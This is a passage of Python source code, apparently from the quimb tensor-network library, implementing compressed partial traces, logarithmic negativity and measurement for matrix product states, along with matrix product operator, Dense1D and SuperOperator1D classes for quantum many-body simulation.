f"using options: eps={veps}, method={vmethod}, "
f"max_bond={vmax_bond}.")
# do vertical SVD
kb.replace_with_svd(
section_tags, (ul, ur), right_inds=(ll, lr), eps=veps,
ltags='_UP', rtags='_DOWN', method=vmethod, inplace=True,
max_bond=vmax_bond, **compress_opts)
# cut joined bond by reindexing to upper- and lower- ind_id.
kb.cut_between((mps.site_tag(section[0]), '_UP'),
(mps.site_tag(section[0]), '_DOWN'),
f"_tmp_ind_u{label}",
f"_tmp_ind_l{label}")
else:
# just unfold and fuse physical indices:
# |
# -A-A-A-A-A-A-A- -AAAAAAA-
# | | | | | | | ===>
# -A-A-A-A-A-A-A- -AAAAAAA-
# |
if verbosity >= 1:
print(f"Just vertical unfolding section {label}.")
kb, sec = kb.partition(section_tags, inplace=True)
sec_l, sec_u = sec.partition('_KET', inplace=True)
T_UP = (sec_u ^ all)
T_UP.add_tag('_UP')
T_UP.fuse_({f"_tmp_ind_u{label}":
[mps.site_ind(i) for i in section]})
T_DN = (sec_l ^ all)
T_DN.add_tag('_DOWN')
T_DN.fuse_({f"_tmp_ind_l{label}":
[mps.site_ind(i) for i in section]})
kb |= T_UP
kb |= T_DN
def partial_trace_compress(self, sysa, sysb, eps=1e-8,
method=('isvd', None), max_bond=(None, 1024),
leave_short=True, renorm=True,
lower_ind_id='b{}', verbosity=0,
**compress_opts):
r"""Perform a compressed partial trace using singular value
lateral then vertical decompositions of transfer matrix products::
.....sysa...... ...sysb....
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | | | | | | | | | | | |
==> form inner product
............... ...........
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | | | | | | | | | | | |
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
==> lateral SVD on each section
.....sysa...... ...sysb....
/\ /\ /\ /\
... ~~~E A~~~~~~~~~~~A E~E B~~~~~~~B E~~~ ...
\/ \/ \/ \/
==> vertical SVD and unfold on A & B
| |
/-------A-------\ /-----B-----\
... ~~~E E~E E~~~ ...
\-------A-------/ \-----B-----/
| |
With various special cases including OBC or end spins included in
subsytems.
Parameters
----------
sysa : sequence of int
The sites, which should be contiguous, defining subsystem A.
sysb : sequence of int
The sites, which should be contiguous, defining subsystem B.
eps : float or (float, float), optional
Tolerance(s) to use when compressing the subsystem transfer
matrices and vertically decomposing.
method : str or (str, str), optional
Method(s) to use for laterally compressing the state then
vertially compressing subsytems.
max_bond : int or (int, int), optional
The maximum bond to keep for laterally compressing the state then
vertially compressing subsytems.
leave_short : bool, optional
If True (the default), don't try to compress short sections.
renorm : bool, optional
If True (the default), renomalize the state so that ``tr(rho)==1``.
lower_ind_id : str, optional
The index id to create for the new density matrix, the upper_ind_id
is automatically taken as the current site_ind_id.
compress_opts : dict, optional
If given, supplied to ``partial_trace_compress`` to govern how
singular values are treated. See ``tensor_split``.
verbosity : {0, 1}, optional
How much information to print while performing the compressed
partial trace.
Returns
-------
rho_ab : TensorNetwork
Density matrix tensor network with
``outer_inds = ('k0', 'k1', 'b0', 'b1')`` for example.
"""
N = self.L
if (len(sysa) + len(sysb) == N) and not self.cyclic:
return self.bipartite_schmidt_state(len(sysa), get='rho')
# parse horizontal and vertical svd tolerances and methods
try:
heps, veps = eps
except (ValueError, TypeError):
heps = veps = eps
try:
hmethod, vmethod = method
except (ValueError, TypeError):
hmethod = vmethod = method
try:
hmax_bond, vmax_bond = max_bond
except (ValueError, TypeError):
hmax_bond = vmax_bond = max_bond
# the sequence of sites in each of the 'environment' sections
envm = range(max(sysa) + 1, min(sysb))
envl = range(0, min(sysa))
envr = range(max(sysb) + 1, N)
# spread norm, and if not cyclic put in mixed canonical form, taking
# care that the orthogonality centre is in right place to use identity
k = self.copy()
k.left_canonize()
k.right_canonize(max(sysa) + (bool(envm) or bool(envr)))
# form the inner product
b = k.conj()
k.add_tag('_KET')
b.add_tag('_BRA')
kb = k | b
# label the various partitions
names = ('_ENVL', '_SYSA', '_ENVM', '_SYSB', '_ENVR')
for name, where in zip(names, (envl, sysa, envm, sysb, envr)):
if where:
kb.add_tag(name, where=map(self.site_tag, where), which='any')
if self.cyclic:
# can combine right and left envs
sections = [envm, sysa, sysb, (*envr, *envl)]
else:
sections = [envm]
# if either system includes end, can ignore and use identity
if 0 not in sysa:
sections.append(sysa)
if N - 1 not in sysb:
sections.append(sysb)
# ignore empty sections
sections = list(filter(len, sections))
# figure out the various indices
ul_ur_ll_lrs = []
for section in sections:
# ...section[i]....
# ul[i] -o-o-o-o-o-o-o-o-o- ur[i]
# | | | | | | | | |
# ll[i] -o-o-o-o-o-o-o-o-o- lr[i]
st_left = self.site_tag(section[0] - 1)
st_right = self.site_tag(section[0])
ul, = bonds(kb['_KET', st_left], kb['_KET', st_right])
ll, = bonds(kb['_BRA', st_left], kb['_BRA', st_right])
st_left = self.site_tag(section[-1])
st_right = self.site_tag(section[-1] + 1)
ur, = bonds(kb['_KET', st_left], kb['_KET', st_right])
lr, = bonds(kb['_BRA', st_left], kb['_BRA', st_right])
ul_ur_ll_lrs.append((ul, ur, ll, lr))
# lateral compress sections if long
compressed = []
for section, (ul, _, ll, _) in zip(sections, ul_ur_ll_lrs):
self._do_lateral_compress(self, kb, section, leave_short, ul, ll,
heps, hmethod, hmax_bond, verbosity,
compressed, **compress_opts)
# vertical compress and unfold system sections only
for section, (ul, ur, ll, lr) in zip(sections, ul_ur_ll_lrs):
self._do_vertical_decomp(self, kb, section, sysa, sysb, compressed,
ul, ur, ll, lr, vmethod, vmax_bond, veps,
verbosity, **compress_opts)
if not self.cyclic:
# check if either system is at end, and thus reduces to identities
#
# A-A-A-A-A-A-A-m-m-m- \-m-m-m-
# | | | | | | | | | | ... ==> | | | ...
# A-A-A-A-A-A-A-m-m-m- /-m-m-m-
#
if 0 in sysa:
# get neighbouring tensor
if envm:
try:
TU = TD = kb['_ENVM', '_LEFT']
except KeyError:
# didn't lateral compress
TU = kb['_ENVM', '_KET', self.site_tag(envm[0])]
TD = kb['_ENVM', '_BRA', self.site_tag(envm[0])]
else:
TU = kb['_SYSB', '_UP']
TD = kb['_SYSB', '_DOWN']
ubnd, = kb['_KET', self.site_tag(sysa[-1])].bonds(TU)
lbnd, = kb['_BRA', self.site_tag(sysa[-1])].bonds(TD)
# delete the A system
kb.delete('_SYSA')
kb.reindex_({ubnd: "_tmp_ind_uA", lbnd: "_tmp_ind_lA"})
else:
# or else replace the left or right envs with identites since
#
# >->->->-A-A-A-A- +-A-A-A-A-
# | | | | | | | | ... ==> | | | | |
# >->->->-A-A-A-A- +-A-A-A-A-
#
kb.replace_with_identity('_ENVL', inplace=True)
if N - 1 in sysb:
# get neighbouring tensor
if envm:
try:
TU = TD = kb['_ENVM', '_RIGHT']
except KeyError:
# didn't lateral compress
TU = kb['_ENVM', '_KET', self.site_tag(envm[-1])]
TD = kb['_ENVM', '_BRA', self.site_tag(envm[-1])]
else:
TU = kb['_SYSA', '_UP']
TD = kb['_SYSA', '_DOWN']
ubnd, = kb['_KET', self.site_tag(sysb[0])].bonds(TU)
lbnd, = kb['_BRA', self.site_tag(sysb[0])].bonds(TD)
# delete the B system
kb.delete('_SYSB')
kb.reindex_({ubnd: "_tmp_ind_uB", lbnd: "_tmp_ind_lB"})
else:
kb.replace_with_identity('_ENVR', inplace=True)
kb.reindex_({
'_tmp_ind_uA': self.site_ind('A'),
'_tmp_ind_lA': lower_ind_id.format('A'),
'_tmp_ind_uB': self.site_ind('B'),
'_tmp_ind_lB': lower_ind_id.format('B'),
})
if renorm:
# normalize
norm = kb.trace(['kA', 'kB'], ['bA', 'bB'])
ts = []
tags = kb.tags
# check if we have system A
if '_SYSA' in tags:
ts.extend(kb[sysa[0]])
# check if we have system B
if '_SYSB' in tags:
ts.extend(kb[sysb[0]])
# If we dont' have either (OBC with both at ends) use middle envm
if len(ts) == 0:
ts.extend(kb[envm[0]])
nt = len(ts)
if verbosity > 0:
print(f"Renormalizing for norm {norm} among {nt} tensors.")
# now spread the norm out among tensors
for t in ts:
t.modify(data=t.data / norm**(1 / nt))
return kb
def logneg_subsys(self, sysa, sysb, compress_opts=None,
approx_spectral_opts=None, verbosity=0,
approx_thresh=2**12):
r"""Compute the logarithmic negativity between subsytem blocks, e.g.::
sysa sysb
......... .....
... -o-o-o-o-o-o-A-A-A-A-A-o-o-o-B-B-B-o-o-o-o-o-o-o- ...
| | | | | | | | | | | | | | | | | | | | | | | |
Parameters
----------
sysa : sequence of int
The sites, which should be contiguous, defining subsystem A.
sysb : sequence of int
The sites, which should be contiguous, defining subsystem B.
eps : float, optional
Tolerance to use when compressing the subsystem transfer matrices.
method : str or (str, str), optional
Method(s) to use for laterally compressing the state then
vertially compressing subsytems.
compress_opts : dict, optional
If given, supplied to ``partial_trace_compress`` to govern how
singular values are treated. See ``tensor_split``.
approx_spectral_opts
Supplied to :func:`~quimb.approx_spectral_function`.
Returns
-------
ln : float
The logarithmic negativity.
See Also
--------
MatrixProductState.partial_trace_compress, approx_spectral_function
"""
if not self.cyclic and (len(sysa) + len(sysb) == self.L):
# pure bipartition with OBC
psi = self.bipartite_schmidt_state(len(sysa), get='ket-dense')
d = round(psi.shape[0]**0.5)
return qu.logneg(psi, [d, d])
compress_opts = ensure_dict(compress_opts)
approx_spectral_opts = ensure_dict(approx_spectral_opts)
# set the default verbosity for each method
compress_opts.setdefault('verbosity', verbosity)
approx_spectral_opts.setdefault('verbosity', verbosity)
# form the compressed density matrix representation
rho_ab = self.partial_trace_compress(sysa, sysb, **compress_opts)
# view it as an operator
rho_ab_pt_lo = rho_ab.aslinearoperator(['kA', 'bB'], ['bA', 'kB'])
if rho_ab_pt_lo.shape[0] <= approx_thresh:
tr_norm = norm_trace_dense(rho_ab_pt_lo.to_dense(), isherm=True)
else:
# estimate its spectrum and sum the abs(eigenvalues)
tr_norm = qu.approx_spectral_function(
rho_ab_pt_lo, abs, **approx_spectral_opts)
# clip below 0
return max(0, log2(tr_norm))
def measure(
self,
site,
remove=False,
outcome=None,
renorm=True,
cur_orthog=None,
get=None,
inplace=False,
):
r"""Measure this MPS at ``site``, including projecting the state.
Optionally remove the site afterwards, yielding an MPS with one less
site. In either case the orthogonality center of the returned MPS is
``min(site, new_L - 1)``.
Parameters
----------
site : int
The site to measure.
remove : bool, optional
Whether to remove the site completely after projecting the
measurement. If ``True``, sites greater than ``site`` will be
retagged and reindex one down, and the MPS will have one less site.
E.g::
0-1-2-3-4-5-6
/ / / - measure and remove site 3
0-1-2-4-5-6
- reindex sites (4, 5, 6) to (3, 4, 5)
0-1-2-3-4-5
outcome : None or int, optional
Specify the desired outcome of the measurement. If ``None``, it
will be randomly sampled according to the local density matrix.
renorm : bool, optional
Whether to renormalize the state post measurement.
cur_orthog : None or int, optional
If you already know the orthogonality center, you can supply it
here for efficiencies sake.
get : {None, 'outcome'}, optional
If ``'outcome'``, simply return the outcome, and don't perform any
projection.
inplace : bool, optional
Whether to perform the measurement in place or not.
Returns
-------
outcome : int
The measurement outcome, drawn from ``range(phys_dim)``.
psi : MatrixProductState
The measured state, if ``get != 'outcome'``.
"""
if self.cyclic:
raise ValueError('Not supported on cyclic MPS yet.')
tn = self if inplace else self.copy()
L = tn.L
d = self.phys_dim(site)
# make sure MPS is canonicalized
if cur_orthog is not None:
tn.shift_orthogonality_center(cur_orthog, site)
else:
tn.canonize(site)
# local tensor and physical dim
t = tn[site]
ind = tn.site_ind(site)
# diagonal of reduced density matrix = probs
tii = t.contract(t.H, output_inds=(ind,))
p = do('real', tii.data)
if outcome is None:
# sample an outcome
outcome = do('random.choice', do('arange', d, like=p), p=p)
if get == 'outcome':
return outcome
# project the outcome and renormalize
t.isel_({ind: outcome})
if renorm:
t.modify(data=t.data / p[outcome]**0.5)
if remove:
# contract the projected tensor into neighbor
if site == L - 1:
tn ^= slice(site - 1, site + 1)
else:
tn ^= slice(site, site + 2)
# adjust structure for one less spin
for i in range(site + 1, L):
tn[i].reindex_({tn.site_ind(i): tn.site_ind(i - 1)})
tn[i].retag_({tn.site_tag(i): tn.site_tag(i - 1)})
tn._L = L - 1
else:
# simply re-expand tensor dimensions (with zeros)
t.new_ind(ind, size=d, axis=-1)
return outcome, tn
measure_ = functools.partialmethod(measure, inplace=True)
class MatrixProductOperator(TensorNetwork1DOperator,
TensorNetwork1DFlat,
TensorNetwork1D,
TensorNetwork):
"""Initialise a matrix product operator, with auto labelling and tagging.
Parameters
----------
arrays : sequence of arrays
The tensor arrays to form into a MPO.
shape : str, optional
String specifying layout of the tensors. E.g. 'lrud' (the default)
indicates the shape corresponds left-bond, right-bond, 'up' physical
index, 'down' physical index.
End tensors have either 'l' or 'r' dropped from the string.
upper_ind_id : str
A string specifiying how to label the upper physical site indices.
Should contain a ``'{}'`` placeholder. It is used to generate the
actual indices like: ``map(upper_ind_id.format, range(len(arrays)))``.
lower_ind_id : str
A string specifiying how to label the lower physical site indices.
Should contain a ``'{}'`` placeholder. It is used to generate the
actual indices like: ``map(lower_ind_id.format, range(len(arrays)))``.
site_tag_id : str
A string specifiying how to tag the tensors at each site. Should
contain a ``'{}'`` placeholder. It is used to generate the actual tags
like: ``map(site_tag_id.format, range(len(arrays)))``.
tags : str or sequence of str, optional
Global tags to attach to all tensors.
bond_name : str, optional
The base name of the bond indices, onto which uuids will be added.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_upper_ind_id',
'_lower_ind_id',
'cyclic',
'_L',
)
def __init__(self, arrays, shape='lrud', site_tag_id='I{}', tags=None,
upper_ind_id='k{}', lower_ind_id='b{}', bond_name="",
**tn_opts):
# short-circuit for copying
if isinstance(arrays, MatrixProductOperator):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays)
# process site indices
self._upper_ind_id = upper_ind_id
self._lower_ind_id = lower_ind_id
upper_inds = map(upper_ind_id.format, range(self.L))
lower_inds = map(lower_ind_id.format, range(self.L))
# process site tags
self._site_tag_id = site_tag_id
site_tags = map(site_tag_id.format, range(self.L))
if tags is not None:
if isinstance(tags, str):
tags = (tags,)
else:
tags = tuple(tags)
site_tags = tuple((st,) + tags for st in site_tags)
self.cyclic = (ops.ndim(arrays[0]) == 4)
# transpose arrays to 'lrud' order.
def gen_orders():
lud_ord = tuple(shape.replace('r', "").find(x) for x in 'lud')
rud_ord = tuple(shape.replace('l', "").find(x) for x in 'rud')
lrud_ord = tuple(map(shape.find, 'lrud'))
yield rud_ord if not self.cyclic else lrud_ord
for _ in range(self.L - 2):
yield lrud_ord
yield lud_ord if not self.cyclic else lrud_ord
def gen_inds():
cyc_bond = (rand_uuid(base=bond_name),) if self.cyclic else ()
nbond = rand_uuid(base=bond_name)
yield (*cyc_bond, nbond, next(upper_inds), next(lower_inds))
pbond = nbond
for _ in range(self.L - 2):
nbond = rand_uuid(base=bond_name)
yield (pbond, nbond, next(upper_inds), next(lower_inds))
pbond = nbond
yield (pbond, *cyc_bond, next(upper_inds), next(lower_inds))
def gen_tensors():
for array, site_tag, inds, order in zip(arrays, site_tags,
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=site_tag)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def from_dense(cls, ham, dims, upper_ind_id='k{}',
lower_ind_id='b{}', site_tag_id='I{}',
**split_opts):
"""Create a ``MatrixProductOperator`` directly from a dense vector
Parameters
----------
ham : array_like
The dense operator to convert to MPO from.
dims : sequence of int
Physical subsystem dimensions of each site.
upper_ind_id : str
How to index the upper sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
lower_ind_id : str
How to index the lower sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
site_tag_id : str
How to tag the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
split_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split` to
in order to partition the dense vector into tensors.
Returns
-------
MatrixProductOperator
"""
set_default_compress_mode(split_opts)
L = len(dims)
upper_inds = [upper_ind_id.format(i) for i in range(L)]
lower_inds = [lower_ind_id.format(i) for i in range(L)]
T = Tensor(reshape(ops.asarray(ham), dims+dims),
inds = upper_inds + lower_inds)
def gen_tensors():
# split
# <-- : yield
# : :
# OOOOOOO--O-O-O
# ||||||| | | |
# .......
# left_inds
TM = T
for i in range(L - 1, 0, -1):
TM, TR = TM.split(left_inds=upper_inds[:i]+lower_inds[:i], get='tensors',
rtags=site_tag_id.format(i), **split_opts)
yield TR
TM.add_tag(site_tag_id.format(0))
yield TM
tn = TensorNetwork(gen_tensors())
return cls.from_TN(tn, cyclic=False, L=L,
upper_ind_id=upper_ind_id,
lower_ind_id=lower_ind_id,
site_tag_id=site_tag_id)
def add_MPO(self, other, inplace=False, compress=False, **compress_opts):
"""Add another MatrixProductState to this one.
"""
if self.L != other.L:
raise ValueError("Can't add MPO with another of different length."
f"Got lengths {self.L} and {other.L}")
summed = self if inplace else self.copy()
for i in summed.gen_site_coos():
t1, t2 = summed[i], other[i]
if set(t1.inds) != set(t2.inds):
# Need to use bonds to match indices
reindex_map = {}
if i > 0 or self.cyclic:
pair = ((i - 1) % self.L, i)
reindex_map[other.bond(*pair)] = summed.bond(*pair)
if i < summed.L - 1 or self.cyclic:
pair = (i, (i + 1) % self.L)
reindex_map[other.bond(*pair)] = summed.bond(*pair)
t2 = t2.reindex(reindex_map)
sum_inds = (summed.upper_ind(i), summed.lower_ind(i))
t1.direct_product_(t2, sum_inds=sum_inds)
if compress:
summed.compress(**compress_opts)
return summed
add_MPO_ = functools.partialmethod(add_MPO, inplace=True)
_apply_mps = tensor_network_apply_op_vec
def _apply_mpo(self, other, compress=False, **compress_opts):
A, B = self.copy(), other.copy()
# align the indices and combine into a ladder
A.upper_ind_id = B.upper_ind_id
B.upper_ind_id = "__tmp{}__"
A.lower_ind_id = "__tmp{}__"
AB = A | B
# contract each pair of tensors at each site
for i in range(A.L):
AB ^= A.site_tag(i)
# convert back to MPO and fuse the double bonds
AB.view_as_(
MatrixProductOperator,
upper_ind_id=A.upper_ind_id,
lower_ind_id=B.lower_ind_id,
cyclic=self.cyclic,
)
AB.fuse_multibonds_()
# optionally compress
if compress:
AB.compress(**compress_opts)
return AB
def apply(self, other, compress=False, **compress_opts):
r"""Act with this MPO on another MPO or MPS, such that the resulting
object has the same tensor network structure/indices as ``other``.
For an MPS::
| | | | | | | | | | | | | | | | | |
self: A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A
| | | | | | | | | | | | | | | | | |
other: x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
-->
| | | | | | | | | | | | | | | | | | <- other.site_ind_id
out: y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y
For an MPO::
| | | | | | | | | | | | | | | | | |
self: A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A
| | | | | | | | | | | | | | | | | |
other: B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B
| | | | | | | | | | | | | | | | | |
-->
| | | | | | | | | | | | | | | | | | <- other.upper_ind_id
out: C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C
| | | | | | | | | | | | | | | | | | <- other.lower_ind_id
The resulting TN will have the same structure/indices as ``other``, but
probably with larger bonds (depending on compression).
Parameters
----------
other : MatrixProductOperator or MatrixProductState
The object to act on.
compress : bool, optional
Whether to compress the resulting object.
compress_opts
Supplied to :meth:`TensorNetwork1DFlat.compress`.
Returns
-------
MatrixProductOperator or MatrixProductState
"""
if isinstance(other, MatrixProductState):
return self._apply_mps(other, compress=compress, **compress_opts)
elif isinstance(other, MatrixProductOperator):
return self._apply_mpo(other, compress=compress, **compress_opts)
else:
raise TypeError("Can only Dot with a MatrixProductOperator or a "
f"MatrixProductState, got {type(other)}")
dot = apply
def permute_arrays(self, shape='lrud'):
"""Permute the indices of each tensor in this MPO to match ``shape``.
This doesn't change how the overall object interacts with other tensor
networks but may be useful for extracting the underlying arrays
consistently. This is an inplace operation.
Parameters
----------
shape : str, optional
A permutation of ``'lrud'`` specifying the desired order of the
left, right, upper and lower (down) indices respectively.
"""
for i in self.sites:
inds = {'u': self.upper_ind(i), 'd': self.lower_ind(i)}
if self.cyclic or i > 0:
inds['l'] = self.bond(i, (i - 1) % self.L)
if self.cyclic or i < self.L - 1:
inds['r'] = self.bond(i, (i + 1) % self.L)
inds = [inds[s] for s in shape if s in inds]
self[i].transpose_(*inds)
def trace(self, left_inds=None, right_inds=None):
"""Take the trace of this MPO.
"""
if left_inds is None:
left_inds = map(self.upper_ind, self.gen_site_coos())
if right_inds is None:
right_inds = map(self.lower_ind, self.gen_site_coos())
return super().trace(left_inds, right_inds)
def partial_transpose(self, sysa, inplace=False):
"""Perform the partial transpose on this MPO by swapping the bra and
ket indices on sites in ``sysa``.
Parameters
----------
sysa : sequence of int or int
The sites to transpose indices on.
inplace : bool, optional
Whether to perform the partial transposition inplace.
Returns
-------
MatrixProductOperator
"""
tn = self if inplace else self.copy()
if isinstance(sysa, Integral):
sysa = (sysa,)
tmp_ind_id = "__tmp_{}__"
tn.reindex_({tn.upper_ind(i): tmp_ind_id.format(i) for i in sysa})
tn.reindex_({tn.lower_ind(i): tn.upper_ind(i) for i in sysa})
tn.reindex_({tmp_ind_id.format(i): tn.lower_ind(i) for i in sysa})
return tn
def __add__(self, other):
"""MPO addition.
"""
return self.add_MPO(other, inplace=False)
def __iadd__(self, other):
"""In-place MPO addition.
"""
return self.add_MPO(other, inplace=True)
def __sub__(self, other):
"""MPO subtraction.
"""
return self.add_MPO(-1 * other, inplace=False)
def __isub__(self, other):
"""In-place MPO subtraction.
"""
return self.add_MPO(-1 * other, inplace=True)
@property
def lower_inds(self):
"""An ordered tuple of the actual lower physical indices.
"""
return tuple(map(self.lower_ind, self.gen_site_coos()))
def rand_state(self, bond_dim, **mps_opts):
"""Get a random vector matching this MPO.
"""
return qu.tensor.MPS_rand_state(
self.L, bond_dim=bond_dim,
phys_dim=[self.phys_dim(i) for i in self.sites],
dtype=self.dtype, cyclic=self.cyclic, **mps_opts
)
def identity(self, **mpo_opts):
"""Get a identity matching this MPO.
"""
return qu.tensor.MPO_identity_like(self, **mpo_opts)
def show(self, max_width=None):
l1 = ""
l2 = ""
l3 = ""
num_can_l, num_can_r = self.count_canonized()
for i in range(self.L - 1):
bdim = self.bond_size(i, i + 1)
strl = len(str(bdim))
l1 += f"│{bdim}"
l2 += (">" if i < num_can_l else
"<" if i >= self.L - num_can_r else
"●") + ("─" if bdim < 100 else "━") * strl
l3 += "│" + " " * strl
l1 += "│"
l2 += "<" if num_can_r > 0 else "●"
l3 += "│"
if self.cyclic:
bdim = self.bond_size(0, self.L - 1)
bnd_str = ("─" if bdim < 100 else "━") * strl
l1 = f" {bdim}{l1}{bdim} "
l2 = f"+{bnd_str}{l2}{bnd_str}+"
l3 = f" {' ' * strl}{l3}{' ' * strl} "
print_multi_line(l1, l2, l3, max_width=max_width)
class Dense1D(TensorNetwork1DVector,
TensorNetwork1D,
TensorNetwork):
"""Mimics other 1D tensor network structures, but really just keeps the
full state in a single tensor. This allows e.g. applying gates in the same
way for quantum circuit simulation as lazily represented hilbert spaces.
Parameters
----------
array : array_like
The full hilbert space vector - assumed to be made of equal hilbert
spaces each of size ``phys_dim`` and will be reshaped as such.
phys_dim : int, optional
The hilbert space size of each site, default: 2.
tags : sequence of str, optional
Extra tags to add to the tensor network.
site_ind_id : str, optional
String formatter describing how to label the site indices.
site_tag_id : str, optional
String formatter describing how to label the site tags.
tn_opts
Supplied to :class:`~quimb.tensor.tensor_core.TensorNetwork`.
"""
_EXTRA_PROPS = (
'_site_ind_id',
'_site_tag_id',
'_L',
)
def __init__(self, array, phys_dim=2, tags=None,
site_ind_id='k{}', site_tag_id='I{}', **tn_opts):
# copy short-circuit
if isinstance(array, Dense1D):
super().__init__(array)
return
# work out number of sites and sub-dimensions etc.
self._L = qu.infer_size(array, base=phys_dim)
dims = [phys_dim] * self.L
data = ops.asarray(array).reshape(*dims)
# process site indices
self._site_ind_id = site_ind_id
site_inds = [self.site_ind(i) for i in range(self.L)]
# process site tags
self._site_tag_id = site_tag_id
site_tags = oset(self.site_tag(i) for i in range(self.L))
if tags is not None:
# mix in global tags
site_tags = tags_to_oset(tags) | site_tags
T = Tensor(data=data, inds=site_inds, tags=site_tags)
super().__init__([T], virtual=True, **tn_opts)
@classmethod
def rand(cls, n, phys_dim=2, dtype=float, **dense1d_opts):
"""Create a random dense vector 'tensor network'.
"""
array = qu.randn(phys_dim ** n, dtype=dtype)
array /= qu.norm(array, 'fro')
return cls(array, **dense1d_opts)
class SuperOperator1D(
TensorNetwork1D,
TensorNetwork,
):
r"""A 1D tensor network super-operator class::
0 1 2 n-1
| | | | <-- outer_upper_ind_id
O===O===O== =O
|\ |\ |\ |\ <-- inner_upper_ind_id
) ) ) ... ) <-- K (size of local Kraus sum)
|/ |/ |/ |/ <-- inner_lower_ind_id
O===O===O== =O
| | : | | <-- outer_lower_ind_id
:
chi (size of entangling bond dim)
Parameters
----------
arrays : sequence of arrays
The data arrays defining the superoperator, this should be a sequence
of 2n arrays, such that the first two correspond to the upper and lower
operators acting on site 0 etc. The arrays should be 5 dimensional
unless OBC conditions are desired, in which case the first two and last
two should be 4-dimensional. The dimensions of array can be should
match the ``shape`` option.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_outer_upper_ind_id',
'_inner_upper_ind_id',
'_inner_lower_ind_id',
'_outer_lower_ind_id',
'cyclic',
'_L',
)
def __init__(
self, arrays,
shape='lrkud',
site_tag_id='I{}',
outer_upper_ind_id='kn{}',
inner_upper_ind_id='k{}',
inner_lower_ind_id='b{}',
outer_lower_ind_id='bn{}',
tags=None,
tags_upper=None,
tags_lower=None,
**tn_opts,
):
# short-circuit for copying
if isinstance(arrays, SuperOperator1D):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays) // 2
# process indices
self._outer_upper_ind_id = outer_upper_ind_id
self._inner_upper_ind_id = inner_upper_ind_id
self._inner_lower_ind_id = inner_lower_ind_id
self._outer_lower_ind_id = outer_lower_ind_id
outer_upper_inds = map(outer_upper_ind_id.format, self.gen_site_coos())
inner_upper_inds = map(inner_upper_ind_id.format, self.gen_site_coos())
inner_lower_inds = map(inner_lower_ind_id.format, self.gen_site_coos())
outer_lower_inds = map(outer_lower_ind_id.format, self.gen_site_coos())
# process tags
self._site_tag_id = site_tag_id
tags = tags_to_oset(tags)
tags_upper = tags_to_oset(tags_upper)
tags_lower = tags_to_oset(tags_lower)
def gen_tags():
for site_tag in self.site_tags:
yield (site_tag,) + tags + tags_upper
yield (site_tag,) + tags + tags_lower
self.cyclic = (ops.ndim(arrays[0]) == 5)
# transpose arrays to 'lrkud' order
# u
# |
# l--O--r
# |\
# d k
def gen_orders():
lkud_ord = tuple(shape.replace('r', "").find(x) for x in 'lkud')
rkud_ord = tuple(shape.replace('l', "").find(x) for x in 'rkud')
lrkud_ord = tuple(map(shape.find, 'lrkud'))
yield rkud_ord if not self.cyclic else lrkud_ord
yield rkud_ord if not self.cyclic else lrkud_ord
for _ in range(self.L - 2):
yield lrkud_ord
yield lrkud_ord
yield lkud_ord if not self.cyclic else lrkud_ord
yield lkud_ord if not self.cyclic else lrkud_ord
def gen_inds():
# |<- outer_upper_ind
# cycU_ix or pU_ix --O-- nU_ix
# /|<- inner_upper_ind
# k_ix ->(
# \|<- inner_lower_ind
# cycL_ix or pL_ix --O-- nL_ix
# |<- outer_lower_ind
if self.cyclic:
cycU_ix, cycL_ix = (rand_uuid(),), (rand_uuid(),)
else:
cycU_ix, cycL_ix = (), ()
nU_ix, nL_ix, k_ix = rand_uuid(), rand_uuid(), rand_uuid()
yield (*cycU_ix, nU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (*cycL_ix, nL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
pU_ix, pL_ix = nU_ix, nL_ix
for _ in range(self.L - 2):
nU_ix, nL_ix, k_ix = rand_uuid(), rand_uuid(), rand_uuid()
yield (pU_ix, nU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (pL_ix, nL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
pU_ix, pL_ix = nU_ix, nL_ix
k_ix = rand_uuid()
yield (pU_ix, *cycU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (pL_ix, *cycL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
def gen_tensors():
for array, tags, inds, order in zip(arrays, gen_tags(),
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=tags)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def rand(cls, n, K, chi, phys_dim=2, herm=True,
cyclic=False, dtype=complex, **superop_opts):
def gen_arrays():
for i in range(n):
shape = []
if cyclic or (i != 0):
shape += [chi]
if cyclic or (i != n - 1):
shape += [chi]
shape += [K, phys_dim, phys_dim]
data = qu.randn(shape=shape, dtype=dtype)
yield data
if herm:
yield data.conj()
else:
yield qu.randn(shape=shape, dtype=dtype)
arrays = map(ops.sensibly_scale, gen_arrays())
return cls(arrays, **superop_opts)
@property
def outer_upper_ind_id(self):
return self._outer_upper_ind_id
@property
def inner_upper_ind_id(self):
return self._inner_upper_ind_id
@property
def inner_lower_ind_id(self):
return self._inner_lower_ind_id
@property
def outer_lower_ind_id(self):
return self._outer_lower_ind_id
class TNLinearOperator1D(spla.LinearOperator):
r"""A 1D tensor network linear operator like::
start stop - 1
. .
